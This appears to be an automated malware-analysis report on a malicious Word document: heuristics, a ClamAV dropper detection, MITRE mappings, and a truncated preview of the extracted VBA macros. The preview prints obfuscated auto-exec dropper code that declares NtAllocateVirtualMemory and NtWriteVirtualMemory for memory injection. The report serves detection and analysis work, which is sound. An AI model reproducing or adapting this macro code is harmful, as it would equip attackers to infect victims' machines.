MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and configured to execute shell commands, indicating an intent to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6360759-0' further supports its malicious nature as a dropper.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6360759-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6360759-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45372 bytes |
SHA-256: a28c9e12bf1cd0f0c531f892034308476238350b57828b7402208f204e79fb28 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub numStyle() ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _ .PageNumbers.NumberStyle = wdPageNumberStyleLowercaseLetter End Sub Private Sub Document_Open() Dim chichewa As Variant Dim tallgrass As String begrimed = "blasphemously" bearable = "insculptured" woland.barroom hospes = 10 + 90 teucrium = 8520 + 7 unthreatened = 105260 + 4 Pmt 0, hospes, 27087, 31782, 7 End Sub Attribute VB_Name = "blast" #If (9 * 3 + 5) > (8 - 3 * 1) And (Win64) > (35 - 7 * 5) * 4 Then Public Declare PtrSafe Function inflation Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (twirlingly As Any, ByVal crucis As Any, ByVal sophistication As Any, ByVal dreaming As Any, ByVal achromatous As Any, ByVal assembler As Any, ByVal attemptable As Any) As LongPtr Public Declare PtrSafe Function dichotomization Lib "Shlwapi.dll " Alias _ "GetOverlappedResult" (ByVal aestival As Any, acquirable As Any, disa As Any, corgi As Any) As LongPtr Public Declare PtrSafe Function doughface Lib "ntdll.dll" Alias _ "NtCreateEventPair" (humorsome As LongPtr, chromatogenous As LongPtr, ink As LongPtr) As LongPtr Public Declare PtrSafe Function employe Lib "Kernel32.dll" Alias _ "CreateEventW" (ByVal nervy As LongPtr, revelling As LongPtr, tibetan As LongPtr, celluloid As LongPtr, domine As LongPtr) As Long Public Declare PtrSafe Function utricle Lib "Shlwapi.dll " Alias _ "SleepConditionVariableSRW" (ByVal malaprop As Any, damage As Any, tranquillization As Any, associate As Any) As LongPtr Public Declare PtrSafe Function zocle Lib "Ntdll.dll " Alias _ "NtAllocateVirtualMemory" (onesided As LongPtr, causation As LongPtr, ByVal misinformaton As LongPtr, dispassionByVal As LongPtr, astonished As LongPtr, ByVal loge As LongPtr) As LongPtr Public Declare PtrSafe Function classman Lib "Ntdll.dll " Alias _ "AcquireSRWLockShared" (bearing As Any) As LongPtr Public Declare PtrSafe Function vergent Lib "Ntdll.dll " Alias _ "NtWriteVirtualMemory" (ByVal dactyl As Any, ByVal geisha As Any, ByVal mormon As Any, ByVal bloodsucking As Any, ByVal asleep As Any) As LongPtr Public Declare PtrSafe Function coastguard Lib "Shlwapi.dll" Alias _ "CreateFileWrapW" (amylolysis As LongPtr) As LongPtr #End If Public Function undebauched(manakin, avec, inflammable) #If (7 * 4 + 5) > (7 - 2 * 1) And (35 - 7 * 5) * 4 < (Win64) Then Dim asymptoptic As Byte Dim voiced As Integer Dim groundspeed As LongPtr Dim abound As LongPtr Dim bronchitic As LongPtr Dim acervation As Byte Dim anerythmon As LongPtr Dim smitten As LongPtr #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (35 - 7 * 5) * 4 < (Win64) Then Dim abound As Long Dim omne As Long Dim groundspeed As Long Dim pericardial As Byte Dim anerythmon As Long Dim coactive As Long Dim bronchitic As Long Dim iodoprotein As String Dim smitten As Long Dim jurisdiction As Integer Dim reproachfully As Integer #End If alopiidae = "misconjecture" alopiidae = "eliminate" abound = manakin smitten = inflammable cagliostro = Math.Round(424) anerythmon = avec commensurability = 23 vegetarian = 33824 neodarwinism = 361917 Pmt 0, commensurability, 34165, 31309, 5 dismal = Rnd(211) groundspeed = 122 - 125 + 2 vergent ByVal groundspeed, abound, anerythmon, smitten, bronchitic alopiidae = motheaten End Function Function remuda(nuptse) Dim gauger As Variant Dim plexiglas As Long Dim conjure As Integer Dim swing As Long #If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then Dim lamende As Long Dim aloneness As LongPtr legend = 11 - 35 + 32 Dim conqueror As LongPtr Dim unmodernized As Byte Dim bestially As Variant Dim bornagain As LongPtr Dim radiochlorine As Integer #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (35 - 7 * 5) * 4 < (Win64) Then Dim aloneness A ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.